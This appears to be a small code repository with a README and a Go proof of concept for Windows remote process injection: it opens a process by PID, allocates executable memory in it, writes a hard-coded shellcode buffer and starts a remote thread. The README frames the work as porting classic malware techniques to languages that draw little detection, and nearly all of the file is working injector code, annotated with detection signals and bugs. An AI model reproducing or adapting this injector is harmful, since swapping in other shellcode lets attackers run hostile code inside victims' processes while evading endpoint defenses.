├── README.md
└── remoteInject.go

/README.md:
# GodeInjection

This repo is just to host my PoC for remote code injection using Golang and calling Windows API's. I showcased using these type of syscalls in my blog located [here](https://anubissec.github.io/How-To-Call-Windows-APIs-In-Golang/)


I mainly made this for two reasons, to learn more about Go and to learn about how process injection actually worked. I like the idea of taking classic malware techniques and porting them to other languages that get very little detection (i.e. Golang, Nim, etc).

I made this a while ago but am sharing it now in case anyone else will benefit from this.

/remoteInject.go:
// +build windows
package main

import (
	"unsafe"
	"log"
	"encoding/hex"
	"flag"
	"fmt"

	"golang.org/x/sys/windows"
)

// main is a proof-of-concept remote code injector: it opens another process
// by PID, allocates a region inside it, copies a byte buffer that is
// hard-coded in this file into that region, changes the region to executable
// and starts a thread on it. Every step is a documented kernel32 export
// resolved through NewLazySystemDLL, and the call sequence
// (OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> VirtualProtectEx ->
// CreateRemoteThreadEx) is the textbook pattern that endpoint defenses and
// Sysmon (Event ID 8, CreateRemoteThread) alert on. Nothing is returned;
// failures before the thread is started terminate the program via log.Fatal,
// later failures are only printed.
func main() {
	// -pid defaults to 0 and is never validated; whatever value is given is
	// cast to uint32 and passed to OpenProcess unchanged.
	pid := flag.Int("pid", 0, "Proc")
	flag.Parse()

	// The four exports are resolved lazily; each NewProc is looked up on its
	// first Call.
	kernel32DLL := windows.NewLazySystemDLL("kernel32.dll")

	WriteProcessMemory := kernel32DLL.NewProc("WriteProcessMemory")
	VirtualAllocEx := kernel32DLL.NewProc("VirtualAllocEx")
	VirtualProtectEx := kernel32DLL.NewProc("VirtualProtectEx")
	CreateRemoteThreadEx := kernel32DLL.NewProc("CreateRemoteThreadEx")

	// Get a handle on remote process, requesting the access rights the
	// later calls use (thread creation, VM operation/read/write, query).
	// OpenProcess is the typed x/sys/windows wrapper, so errProc is non-nil
	// only on an actual failure, unlike the LazyProc.Call results below.
	pHandle, errProc := windows.OpenProcess(windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION, false, uint32(*pid))
	if errProc != nil {
		log.Fatal(fmt.Sprintf("[!]Error calling OpenProcess:\r\n%s", errProc.Error()))
	}
	//fmt.Println(fmt.Sprintf("[+] Successfully got a handle to process %d", *pid))

	// Pop Calc (32 bit payload)
	//"505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3"

	// The payload is embedded in the binary as a hex string literal and
	// decoded into buf; it is not read from a file, argument or the network.
	buf, bufErr := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3")
	if bufErr != nil {
		log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", bufErr.Error()))
	}
	//fmt.Println("[+] Successfully decoded payload")

	// Get a pointer to the cave of code carved out in the remote process.
	// The region is committed PAGE_EXECUTE_READWRITE here and lowered to
	// PAGE_EXECUTE_READ further down; an RWX allocation in a foreign process
	// followed by that transition is exactly what memory scanners flag.
	//
	// LazyProc.Call always returns a non-nil error (it wraps GetLastError),
	// which is why the author filters the ERROR_SUCCESS text by string
	// comparison instead of a plain nil check.
	pRemoteCode, _, errVirtualAlloc := VirtualAllocEx.Call(uintptr(pHandle), 0, uintptr(len(buf)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
	if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." {
		log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error()))
	}
	//fmt.Println(fmt.Sprintf("[+] Successfully allocated a region of memory in remote process %d", *pid))

	// Write the payload into the code cave. &buf[0] would panic on an empty
	// buffer, but buf comes from the fixed literal above so it is never empty.
	_, _, errWriteProcessMemory := WriteProcessMemory.Call(uintptr(pHandle), pRemoteCode, (uintptr)(unsafe.Pointer(&buf[0])), uintptr(len(buf)))

	if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." {
		log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error()))
	}
	//fmt.Println(fmt.Sprintf("[+] Wrote the payload to process %d", *pid))

	// oldProtect receives the previous protection of the region. A failure
	// here is only printed, not fatal. Note the Printf format string carries
	// no verbs, so the two extra arguments are emitted as %!(EXTRA ...)
	// noise (go vet reports this).
	oldProtect := windows.PAGE_READWRITE
	_, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(pHandle), pRemoteCode, uintptr(len(buf)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
	if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." {
		fmt.Printf("[!] Error on VirtualProtect:", errVirtualProtectEx, "\n")
	}
	//fmt.Println(fmt.Sprintf("[+] Successfully changed permissions to PAGE_EXECUTE_READ in PID %d", *pid))

	// Start a thread in the target at the written region. The thread handle
	// (first return value) is discarded and never closed. errCreate is only
	// nil-checked, so given Call's always-non-nil error this branch is
	// entered on success too; the fmt.Sprintf result is discarded, so
	// nothing is printed either way (go vet: result of Sprintf not used).
	_, _, errCreate := CreateRemoteThreadEx.Call(uintptr(pHandle), 0, 0, pRemoteCode, 0, 0, 0)
	if errCreate != nil {
		fmt.Sprintf("[!] Error on CreateRemoteThread:", errCreate, "\n")
	}
	//fmt.Println("[+] Creating remote thread to execute shellcode")

	// Only the process handle is released; the remote allocation is left in
	// place. Same no-verb Printf issue as above.
	errCloseHandle := windows.CloseHandle(pHandle)
	if errCloseHandle != nil {
		fmt.Printf("[!] Error on CLoseHandle:", errCloseHandle, "\n")
	}
	//fmt.Println(fmt.Sprintf("[+] Closed handle on the processe %d", *pid))

}